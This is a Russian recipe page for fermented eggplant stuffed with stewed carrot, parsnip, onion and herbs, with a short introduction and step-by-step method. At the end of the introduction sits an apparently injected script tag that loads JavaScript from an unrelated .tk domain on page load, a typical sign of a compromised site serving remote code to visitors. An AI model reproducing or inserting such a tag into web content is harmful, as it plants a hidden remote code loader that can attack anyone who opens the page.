Квашеные баклажаны

Квашеные баклажаны
Квашеные баклажаны

Оценить рецепт: 

Нет оценки
Средне
1 час

Если так подумать, то квашеные баклажаны это та же консервация, единственное, чем отличаются эти два процесса так это в отсутствие уксуса. Так же мне нравится, что их можно приготовить небольшую порцию, хоть даже одну штучку, а вот для консервации необходимо готовить уже не на одну банку. И одно я знаю точно, что в преддверии больших посиделок, такие баклажаны на столе точно лишними не будут.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Ингредиенты: 
Баклажан
10 шт.
Морковка
3 шт.
Пастернак
2 шт.
Лук
3 шт.
Зелень
1 пучок
Соль
Перец
Растительное масло
для жарки
Квашеные баклажаны

Начинаю готовку с обработки овощей. Баклажаны нужно помыть, разрезать вдоль на две части и отварить в солёной воде на протяжении 10 минут. Все остальные овощи нарезаю соломкой и только лук полукольцами.

Квашеные баклажаны

Теперь подготовленные овощи должны пройти термическую обработку, а именно тушим их на сковороде с маслом в не большом количестве воды на протяжении 7 минут.

Квашеные баклажаны

Следующим шагом фарширую баклажаны. Выкладываю на одну половину баклажана начинку, поверх начинки кладу пару веточек зелени и складываю всё в плоскую ёмкость. Накрываю все это дело тарелкой и придавливаю прессом. На протяжении 3 дней храню в теплом месте, после чего они готовы к употреблению.
Приятного аппетита.

Понравился рецепт? Оставьте комментарий